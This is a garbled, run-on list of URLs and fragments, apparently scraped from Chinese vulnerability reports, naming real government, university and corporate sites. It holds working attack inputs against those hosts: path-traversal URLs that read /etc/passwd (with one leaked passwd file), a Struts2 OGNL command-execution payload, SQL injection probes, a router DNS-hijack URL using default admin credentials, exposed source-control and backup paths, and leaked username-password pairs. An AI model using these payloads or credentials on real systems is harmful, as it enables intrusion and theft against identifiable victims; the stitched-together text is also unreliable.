http://g3.letv.com/37/53/63/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-1.jpg http://g3.letv.com/34/4/73/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-10.jpg http://g3.letv.com/37/40/79/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-11.jpg http://g3.letv.com/40/4/86/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-12.jpg http://g3.letv.com/34/25/87/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-13.jpg http://g3.letv.com/34/22/2/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-14.jpg http://g3.letv.com/38/46/93/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-15.jpg http://g3.letv.com/40/11/59/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-16.jpg http://g3.letv.com/40/28/23/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-17.jpg http://g3.letv.com/38/28/61/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-18.jpg http://g3.letv.com/36/15/25/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-19.jpg http://g3.letv.com/39/48/110/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-2.jpg http://g3.letv.com/33/21/8/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-20.jpg http://g3.letv.com/35/43/40/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-21.jpg http://g3.letv.com/35/43/96/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-22.jpg http://g3.letv.com/34/39/95/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-23.jpg http://g3.letv.com/33/15/107/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-24.jpg http://g3.letv.com/38/2/32/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-25.jpg http://g3.letv.com/40/50/90/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-26.jpg http://g3.letv.com/40/41/91/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-27.jpg http://g3.letv.com/32/1/73/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-28.jpg http://g3.letv.com/35/5/104/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-29.jpg http://g3.letv.com/38/15/109/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-3.jpg http://g3.letv.com/37/21/93/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-30.jpg http://g3.letv.com/35/48/29/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-31.jpg http://g3.letv.com/40/47/113/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-4.jpg http://g3.letv.com/37/50/73/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-5.jpg http://g3.letv.com/33/1/13/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-6.jpg http://g3.letv.com/33/20/32/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-7.jpg http://g3.letv.com/34/24/14/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-8.jpg http://g3.letv.com/32/37/38/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-9.jpg http://116.228.55.39/login.jsp http://stat.hjsm.tom.com/ http://stat.hjsm.tom.com/.svn/entries http://chat.skype.tom.com/.svn/entries http://www.maxen.com.cn/ http://www.maxen.com.cn/manage/login.php http://cq.ip66.com/m/manager/login.php http://hr.sf-express.com http://m.inewsweek.cn/politics/detail.php?id=77851 http://tea.ac.cn/resume.asp?orderid=207 http://wx.locojoy.com:8028/BindAccount/BindJumpUrl?microMessageAccount=2&rnd=9011332623 http://admin.eguan.cn/admin.php http://www.yonyou.com.hk/new/content.php?uid=88&sid=107 http://221.176.65.1/ http://www.baidu.com/s?ie=utf-8&bs=site%3Azhcw.com+%2Fxinwen%2Fbocai&f=8&rsv_bp=1&rsv_spt=3&wd=site%3Azhcw.com+inurl%3A%2Fxinwen%2Fbocai&rsv_sug3=8&rsv_sug4=433&rsv_sug2=0&inputT=1 http://xlzx.nau.edu.cn/1.rar http://author.ks.91.com:80/resources/html/authorreadhelp.aspx?flag=*&stamp=20121008152034189 http://blog.jobui.com/ http://www.youneng.com/Manager/LoginLocation.aspx www.youneng.com http://www.youneng.com http://zx.nau.edu.cn/admin/ewebeditor/admin http://zkzs.nau.edu.cn/wooyun.txt http://wlgc.nau.edu.cn/1.txt http://kf.1000kf.com/company.php?arg=1000kf发现参数arg存在sql注入 http://im1.168kf.com/webCompany.php?arg=168kf也是arg参数有sql注入 http://218.94.42.139:85/FrameSet/Login.aspx http://115.182.35.80/login.jsp http://122.225.108.2:8080/accounts/login/?next=/data/index/ http://www.nimrf.net.cn/ept/eptDxtp.action?bbType=1 http://www.nimrf.net.cn/ept/eptDxtp.action?bbType=1 http://www.nimrf.net.cn/ept/eptDxtp.action?bbType=1 http://60.247.10.152:15000/Frame.action http://60.247.10.152:15000/IndexWeihu.action http://java.sun.com/ http://m.anjuke.com/ http://m.anjuke.com/center,点击我要提问,然后输入 http://www.22168168.com/SiteFiles/BackupFiles/2012-08/Templates_2012-08-02-14-30.xml http://www.22168168.com/SiteFiles/BackupFiles/2013-12/Site_2013-12-07-10-35.zip http://audio.cnr.cn/index.php?option=com_content&ItemId=794 http://audio.cnr.cn/index.php?option=com_conte http://sqlmap.org http://www.enfodesk.com http://www.enfodesk.com/SMinisite/newinfo/muserlogin/nand_id/1 http://vip.taobao.com/tjb/raffle.htm?spm=0.0.0.0.h0q414 http://coolcampdv2011.xdf.cn http://coolcampdv2011.xdf.cn/advideo/adindex.php http://20zn.sz.xdf.cn/admin/admin_login.php http://20zn.sz.xdf.cn/admin/admin_login.php http://workflow.tclhk.com/workflow/Login.aspx http://workflow.tclhk.com/workflow/Login.aspx http://www.7cha.com/index.php http://yh1.staff.xdf.cn:28080/yhebp/flex/YhebpApplication.html http://ekt1.wangqi.com/webCompany.php?arg=shcjyy http://adtracker-wb.crm.leju.com http://adtracker.crm.leju.com http://model.ligui.com/m_content.php?id=1107261 http://www.cnu.edu.cn/editortpxx/upload.jsp http://www.lnlaw.gov.cn http://ucard.nenu.edu.cn/EcardDevelopment/index/index_index.action http://demo.pinphp.com/index.php?m=message&a=talk&ftid=22 http://cbscr.iim.ac.cn/keyan_show.php?k_id=52 http://www.okwei.com/cpxq.html?pNO=2506 http://nsec.koolearn.com/subject/kyds/haixuan2013/more.jsp?configId=1&name=q&tal=5286 http://www.douban.com/misc/audit_report?url= http://q.115.com/t-2454-32191.html http://b2b.gigabyte.cn/Login.aspx?ReturnUrl=%2fHome.aspx https://117.121.4.6/ http://class.bjut.edu.cn/OpenCourse/International/iCourse!getOuterCourse.do http://www.ynfnrs.gov.cn/user/Login.asp http://trip.cash.xunlei.com/ http://trip.cash.xunlei.com/.svn/entries http://wangba.kongzhong.com/netcafe/nblist.jsp http://wangba.kongzhong.com/netcafe/frags_list.jsp http://wangba.kongzhong.com/netcafe/frags_list.jsp http://wangba.kongzhong.com/netcafe/frags_list.jsp http://pk.tom.com/web/index.html http://www.onecaresone.com/sch_list.php?cno=1&vname=%E6%98%AD%E8%A7%89%E5%8E%BF%E6%96%B0%E5%9F%8E%E9%95%87%E5%8F%A4%E6%9B%B2%E6%9D%91 http://t.91.com/597437454 http://www.shopnctest.com/c2c/2013/test/ url:http://www.shopnctest.com/c2c/2013/test/mobile/28aeb56bf14c9a5f826f8ad65bc6d7f0.php?commend=order_detail&order_id=570 http://demo.destoon.com/v5.0上弄的。 http://landinfo.mlr.gov.cn/login.do?state=publicFilesDownload&filename=../../../../../../../../../etc/passwd http://cks.mof.gov.cn/crifs/content/docmanage/download.jsp?filePath=../../../../../../etc/passwd http://211.94.187.231/dcdy/download?path=../../../../../../../../../../etc/passwd http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../../../etc/passwd http://www.dsi.gov.mo/srvDownloadFile.do?file_name=../../../../../../../../../../etc/passwd http://ids.gzstats.gov.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../etc/passwd http://www.ansteel.com.cn/main/down.jsp?filePath=/../../../../../../../../../../../../../../../etc/passwd&fileName=1.txt http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/passwd http://bid.zte.com.cn/com/zte/product/ui/web/Application/Default.aspx http://www.ectrip.com/product.html http://www.weekedu.com/web_Org/Notice_info.aspx?infoid=20 http://www.weekedu.com/web_Org/news_info.aspx?infoid=3 http://www.weekedu.com/web_Org/Notice_info.aspx?infoid=20 http://demo18.foxitsoftware.com/eng/login/checkemail.aspx?email=1 http://www.ecard.ldu.edu.cn/ggxxfb.action?lmid=4a42b0f33184b86501318ed87efa0002 http://yktcx.tjut.edu.cn/ggxxfb.action?lmid=40288a87410729660141072ebb060003 http://xyk.jlnu.edu.cn/xxsearch.action?lmid=4028868e1fb19cc7011fd12306690004 http://ecard.sdupsl.edu.cn/ggxxfb.action?lmid=8a8a8a882c33a432012c529df1f90002 http://ecard.qau.edu.cn/xxsearch.action?lmid=8a8a008d234f481601234f6f846c0001 http://ecard.sdwz.cn/ggxxfb.action?lmid=2c918186341c2a1d01341c2d40e90001 http://210.44.8.36/ggxxfb.action?lmid=5e4eb0f4314baec10132a488c6e40003 http://ecard.tust.edu.cn/ggxxfb.action?lmid=529f0a072ba9a271012bc314829d0001 http://ecard.hycollege.net/ggxxfb.action?lmid=4028057026fa7f230126fd98223a0001 http://ecard.hbmu.edu.cn/ggxxfb.action?lmid=5a45b18428b996760128b997a4900001 http://card.niit.edu.cn/ggxxfb.action?lmid=529ceadf33304f68013330dbe3aa0003 http://202.114.64.160:8000/ggxxfb.action?lmid=4af2cc861b4d9a8d011b4dd8e1530003 http://ykt.sict.edu.cn/xxsearch.action?lmid=402881862bd34c97012bd34e28b80001 http://yktcx.njmu.edu.cn/ggxxfb.action?lmid=ff80808132360e750132e49e017f0001 http://card.gdufs.edu.cn/ggxxfb.action?lmid=4af441d1251fa1070125206744f40001 http://e.nfu.me/ggxxfb.action?lmid=402881892d2c8252012d2fe00dac0001 http://ykt.hebut.edu.cn/ggxxfb.action?lmid=f39820bc40ee202c0140ee22317d0001 http://ecard.sjtu.edu.cn/ggxxfb.action?lmid=4af8bf44187768c5011887d19c460004 http://card.tjfsu.edu.cn/ggxxfb.action?lmid=53c45f872b236581012b236971950001 http://ykt.xznu.edu.cn/ggxxfb.action?lmid=4a43c0bd30df88820130df968aee0002 http://card.sdada.edu.cn/ggxxfb.action?lmid= http://ecar.hrbust.edu.cn/ggxxfb.action?lmid= http://ecard.sdu.edu.cn/ggxxfb.action?lmid= http://www.koyimall.com/?act=shop.goods_view&GS=43313 http://m.koyimall.com/?act=shop.goods_view&GS=43313 http://club.show.sina.com.cn/viewthread.php?tid=595162&extra= http://www.csgc.com.cn)某系统多处漏洞缺陷展示 http://www.csgc.com.cn:8080/bsweb/login.jsp http://www.csgc.com.cn:8080/bsweb/login.action http://www.csgc.com.cn:8080/bsweb/download?path= http://www.dongbeiidc.com/web.zip http://60.191.202.167/zjwgy/admin/main.jsp http://www.bzhcw.cn:8088/front/loanApply/loanApplication!goAddLoanApp.action http://www.bzhcw.cn:9090/infointeraction/page/web/getCjwtInfo.action?id=2 http://www.bzhcw.cn:9090/system/loginAction.do http://golf.cctv.com/ http://www.teatreexy.com http://lis.lenovo.com/lots/ http://lis.lenovo.com/lots/forgetpwd.aspx https://passport.wanhui.cn/account/forgetpassword/step1/?wpid=1000292 https://passport.wanhui.cn/account/forgetpassword/step2/?wpid=1000292 http://lis.lenovo.com/LISV2/ http://lis.lenovo.com/RTS/ http://lis.lenovo.com/RTS/forgetpwd.aspx http://www.0000369.cn/index.action http://www.smartshanghai.com/scripts/drivemeto.php?loc_id=-6529 CN:8080,释锐校校用平台。 http://elective.sfls.cn:8080/us/download_file.jsp?path=97-100-103-96-110-42-92-95-104-100-105-40-45-43-44-47-43-44-44-43-43-44-48-52-47-45-40-49-45-47-52-51-48-45-44-49-41-92-110-107-&fileName=44-41-92-110-107-&remote=null http://www.360shop.com.cn http://www.360shop.com.cn:80/ www.360shop.com.cn http://eip.tcl.com http://ego.tcl.com.cn https://kyfw.12306.cn/otn/zwdch/queryCC?train_station_code=SHH http://demo.zoomla.cn/Plugins/Doc.aspx?id=1 http://202.108.9.135/index.action?request_locale=zh_CN http://202.108.9.135/login.action encap:Ethernet d5:b1:52 addr:10.*.*.228 Bcast:10.*.*.255 Mask:255.255.248.0 bff:fed5:b152/64 Scope:Link MTU:1500 packets:1082463247 dropped:1910928390 packets:900262660 txqueuelen:1000 http://t.jiwu.com/info!detail.action http://sz.jiwu.com/loupan/jjr/15532.html http://chongxianport.com/ http://wed.27.cn/marry/marryadmin/web/.svn/entries http://www.jgs.gov.cn http://www.jgs.gov.cn/www.rar http://www.jgs.gov.cn/fangtan/adminzw/main.asp http://www.jgs.gov.cn/adminzw/login.aspx http://yiqi.taobao.com/,苦寻半天没有任何收获,这时候随意一瞥邀请加入引起了我的注意。 http://bingsec.com?spm=0.0.0.0.LyuuFi http://img01.taobaocdn.com/poster_pic/T1qMpCFrRXXXXXXXXX top:1px http://www.taobao.com,成功的将发送者和其它内容遮挡。用户竟然发现淘宝几百年难得一遇的搞起了大抽奖还是肯定中奖这时候就进入了我们的钓鱼网站圈套啦~ display:none http://www.v5yw.net/bg.jpg http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6 http://touch.17u.cn/membership/applylogin.html?returnUrl=%2fdeal%2ftcmemberapplycash.html http://touch.17u.cn http://211.156.193.135/LoginAction.do http://211.156.193.135/DownLoadAction.do http://211.156.193.135/LoginAction.do,发现含有验证码,就直接使用搜索引擎,然后发现了用户名和密码。 http://211.156.193.135/DownLoadAction.do?action=download&fname=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hacluster:x:511:90::/home/hacluster:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin bea:x:512:512::/home/bea:/bin/bash wisentsoft:x:513:513::/home/wisentsoft:/bin/bash oracle:x:1001:1002::/home/oracle:/bin/bash http://m.koyimall.com/?act=shop.goods_view&GS=33427 http://zxks.gxeea.cn:8080/gxzkweb/Page/Index.jsp http://52xinyou.cn/anli.htm http://www.12wan.com http://www.eset.com.cn/news.php http://www.eset.com.cn//2009/0928/cmd.php http://www.eset.com.cn//win/lib/phpmailer/language/phpmailer.lang-zh.php http://www.eset.com.cn//diyold/upimage_bak/small/201005170111256099.gif.php.gif http://www.eset.com.cn//diyold/upimage_bak/201005170111256099.gif.php.gif http://www.eset.com.cn//diyold/upimage/small/201005170111256099.gif.php.gif http://www.eset.com.cn//diyold/upimage/small/201005261253437869.php4.jpg http://reg.eset.com.cn/renewal/head.php http://reg.eset.com.cn/renewal/order_view.php http://reg.eset.com.cn/mailer/language/phpmailer.lang-fc.php http://reg.eset.com.cn/bak/func/H.php http://reg.eset.com.cn/bak/func/test.php http://faq.eset.com.cn/class.phpmailer.php http://faq.eset.com.cn/templates/front/faq/order_view.php www.eset.com.cn/wwwnew/megau/images/bak/ http://www.weekedu.com/ http://www.weekedu.com/web_Org/New_Info.aspx?infoid=3397&typeid=4021 http://www.weekedu.com/web_Org/Course_Default.aspx?typeid=1&name=w'&Type=%E8%AF%BE%E7%A8%8B%E8%B5%84%E6%BA%90 http://52xinyou.cn/anli.htm http://otp.xdf.cn/otp http://otp.xdf.cn/otp/self_register这一步 http://otp.xdf.cn/otp/resources/www/201401/111009594tj9.jsp http://yjscc.shsmu.edu.cn/manage/login.jsp http://27.115.28.245:7777/server.txt ftp://ftp.htinns.com/: http://it.homeinns.com/ito_beta//Main/Login.aspx http://q601333824.duapp.com/3.js http://stat.ccidnet.com/getcode.php?website=100055 line:615 https://kyfw.12306.cn/otn/购买页面限制5秒查询一次,但购票接口无任何时间限制 http://xiaoxi.yonyou.com http://xiaoxi.yonyou.com/manage http://goldpen.ccidnet.com/goldpen/moreArticle.jsp?columnID=11 https://uhost.ucloud.cn http://g.ynet.com/games/plays.php?sid=74 http://g.ynet.com/games/plays.php?sid=74 http://youth1.ynet.com/activity.jsp?cgiMSActId=116 http://youth1.ynet.com/activity.jsp?cgiMSActId=116 http://182.50.1.243:8080/Intervention/Type?project=39 https://www.qingcloud.com/profile http://www.yhachina.com/ls.php?hostID=1&id=62&a=4 http://www.yhachina.com/topic.php?channelID=4&topicID=233 http://manage.shiwan.com/.svn/entries chang:chang zhangtao:zhangtao123 http://zjk.fjbid.gov.cn/Common/AjaxForm.aspx?t=checkUser&v=test123 http://123.127.50.2:8012/userlist.php http://123.127.50.2:8012/getmobile.cgi?receiver= http://123.127.50.2:8012/check.php http://www.whdrc.gov.cn/ http://work.crcc.cn/admin/protected/index.jsp http://share.v.t.qq.com/index.php?c=share&a=index&appkey=1459b2ac3d2345d2a17396eec5ad3bd7&url=http%3A%2F%2Fwww.douban.com%2Fphotos%2Fphoto%2F2165991570%2F&title=%E3%80%90%E8%A6%81%E7%9E%8E%E4%B8%80%E8%B5%B7%E7%9E%8E%E2%80%94%E2%80%94%E5%88%BA%E7%BB%A3%E3%80%91&pic=http%3A%2F%2Fimg3.douban.com%2Fview%2Fphoto%2Fphoto%2Fpublic%2Fp2165991570.jpg http://wooyun.org/bugs/wooyun-2010-013230 https://udb.ucloud.cn http://baoxian.qingdaonews.com/u/521*/logview1441.html http://baoxian.qingdaonews.com/product/list_all_all_1*_1.html http://df.health.qingdaonews.com/doc_search.aspx?page=1&key=1 http://finance.qingdaonews.com/bank/BankList.aspx?bid=4845&sq=0&area=0&text='&sort=pf1 http://finance.qingdaonews.com/bank/banklist_0_0_0_2'_pf1_1.html http://link.jiangmin.com/?id=doc_net http://eblog.cersp.com/fjptcx/zone.asp?op=logclass&z=2&keys=123'&so=blogname&province=undefined http://eblog.cersp.com/fjptcx/zone.asp?op=logclass&z=2 http://www.hydron.com.cn/activity.php?curr_page=activity2&id=11 http://www.hydron.com.cn/activity.php?curr_page=activity2&id=11%20order%20by%208-- http://www.tjmsa.gov.cn/ http://huanke.qingdaonews.com/show_userInfoClass.aspx?id=18&userId=summer_0229hui http://huanke.qingdaonews.com/u/catsily* http://auto.qingdaonews.com/wap/Picture.aspx?seriesid=26715&type=0 http://help.360shop.com.cn/?do=list&mod=faq https://frontier.jin.12306.cn/gateway/jndzsw/jnDzsw/action/ContainerCustomerAction_queryCreditView?fhdwdm=1'%22&fhdwmc=1&fzhzzm=1&fztmism=&qsrq=2014-01-11&zzrq=2014-01-11 http://www.post.com.cn/ http://smscom.12321.cn:8080/ROOT2013.tar http://crew.juneyaoair.com/admin_purser_an_detail.jsp?flight_date=2014-01-10&userCode=S2018641 http://demo.zoomla.cn/Plugins/Doc.aspx http://crew.juneyaoair.com/login.jsp http://crew.juneyaoair.com/upload/Imp138244_0.jsp http://demo.zoomla.cn/Guest/Baike/Classification.aspx?ClassTitle= http://m.koyimall.com http://m.koyimall.com/?act=board.board_view&bbs_seq=100 http://www.gznsjy.net/ http://register.ccidnet.com/passport/ http://game.msn.ynet.com/games/plays.php?sid=53 http://game.msn.ynet.com/games/plays.php?sid=53 http://dev.ucweb.com/ http://ht88.com/user/User_Down_Upload.asp http://jtst.moc.gov.cn:8086/Lanmu.aspx?LanmuID=1 http://wooyun.org/bugs/wooyun-2013-045257 magicbox:/pentest/database/sqlmap# http://admin.zqgame.com:9009/ http://admin.zqgame.com:9009/login?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27whoami%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 inurl:p-reg1.asp https://udb.ucloud.cn http://mail.nxcpic.gov.cn/ http://101.95.32.237:34440/AsFds_1378178109211_Fjc/?user=用户手机号码 http://www.ccidgroup.com/jeecms/ArtiSearch.do http://mail.robot.nankai.edu.cn/webmail http://mail.robot.nankai.edu.cn/webmail/userapply.php?execadd=333&DomainID=111 http://119.97.204.202/ydegov/index.aspx http://wooyun.org/bugs/wooyun-2010-019195 http://mail.hunantv.com/webmail/userapply.php?execadd=333&DomainID=111 http://bbs.lianzhong.com site:project.ccidnet.com http://tcl.iqiyi.com/index.php?action=daoyanjianjie&id=14 http://119.254.230.74:32766/agent/ http://www.lanyears.com/product.asp http://buy.yonyou.com http://buy.yonyou.com/web http://buy.yonyou.com/web/Common/UploadAttachment.aspx http://score.play.yy.com/1v1/zhanshi.php?roleid=-1%20union%20all%20select%201,1,1,1,62,1,1--%20-- http://www.haidilao.com/sg/index.php?m=admin http://tuku.fumu.com/play.php?imagegroupid=66 http://tuku.fumu.com/admin/ www.360shop.com.cn/login.php www.360shop.com.cn http://dynamic.hao.xunlei.com/paycenter?active=pick&number=768544 http://pinyin.sogou.com/dict/admin/index.php http://zcxh.hlje.net/admini/login.aspx http://www.hlje.net/e/tool/wsxf/index.php?MOD=view&id=10997 http://221.208.241.167:8080/login.action http://221.208.241.167:8080/nologin.jsp?o=vLogin http://221.208.241.167:8080/1.txt http://mail.shenyang.gov.cn/admin/password.php?password=admin&password2=admin http://space.100e.com/myspace/AddFriend/?UserID=787638 http://space.100e.com/myspace/AddFriend/?UserID=787638%27 http://space.100e.com/myspace/AddFriend/?UserID=787638 http://buy42.com/buy42/mainpage.do?action=index https://frontier.jin.12306.cn/gateway/jndzsw/jnDzsw/action/action/ContainerTzAction_queryTzdetail?id=2013101201 http://kongbao.airchina.com.cn/kbzb/default.jsp http://www.airmedia.net.cn/admin/ewebeditor/admin/login.php http://userinfo.baihe.com/NickName.action?time=1389597070516 http://ffp.juneyaoair.com/ http://ffp.juneyaoair.com/ http://buding.cn/.svn/entries http://piao.buding.cn/.svn/entries http://s.buding.cn/.svn/entries http://shequan.com/.svn/entries http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.airmedia.net.cn/news/detials.php?infoid=312 http://www.mymiles.com.cn/d/District_list.php?key=4 http://www.mymiles.com.cn/listlocationhx.php?Locationhx=%B1%B1%BE%A9%C4%CF%D4%B7%B9%FA%BC%CA%BB%FA%B3%A1&Ltype=S&City=%B1%B1%BE%A9 http://fan.yoka.com/mergeCss.php?file=/etc/passwd http://jwfile.juneyaoair.com:88/ http://jwfile.juneyaoair.com:88/ http://fan.yoka.com/mergeJavaScript.php?file=ftp:// http://都不能用了(environ那个也用不了,apache被降权了) http://wwwen.zte.com.cn/en/ http://www.vjianke.com/digest/ed5d68c170f748beab3ea20600b08a89.clip http://touch.podinns.com/GetPassword http://post.auto.tom.com/tom.php http://post.auto.tom.com/tom1.php http://post.auto.tom.com/tom111.php android:name=".contentprovider.AccountProvider android:permission="com.renren.xiaonei.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.xiaonei.account android:name=".contentprovider.BaseProvider android:permission="com.renren.xiaonei.android.permission.PERMISSION_ADD_ACCOUNT android:authorities="com.renren.xiaonei.base android:protectionLevel="dangerous",这个不够,声明这个权限又能够读取到信息 android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT android:protectionLevel="dangerous android:name="com.renren.mobile.android.permission.PERMISSION_ADD_ACCOUNT http://www.ziroom.com/index.php?_a=click&_p=../../../../../etc/passwd%00.jpg http://ued.sogou.com/ http://ued.sogou.com/?author=2 http://ued.sogou.com/wp-login.php http://115.236.99.244:8080/login.jsp http://111.13.55.55/webmanage/index.jsp http://club.ellechina.com/forum.php这是dz1.5版本的论坛。我看着用户还是蛮活跃的,百度权重7,管理懂的我想说什么。 http://www.discuz.net/thread-2696203-1-1.html。我就说下我在注射这个的时候遇到的一个问题。正文开始 http://bbs.aili.com/thread-1768300-1-1.html http://club.jinti.com/operation/setmoodinfo.aspx http://club.jinti.com/operation/setmoodinfo.aspx?bodyid=52164&channel=a&classid=0&mood=mood1rand=0.10818770481273532 http://club.jinti.com/operation/setmoodinfo http://sqlmap.org http://web.59.cn/data.rar http://www.thegreatwall.com.cn/长城小站存在严重sql注入漏洞,以致3万多用户资料可能流出 http://www.jxnxs.com/ http://dream.sohu.com/.svn/entries http://holiday.sohu.com/.svn/entries http://www.simic.net.cn/ http://www.simic.net.cn/cc.php http://www.simic.net.cn/c.php http://www.simic.net.cn/cc.php?old_cid=1&new_cid=0 http://www.simic.net.cn/c.php?old_cid=1&new_cid=0 http://www.simic.net.cn/1.php 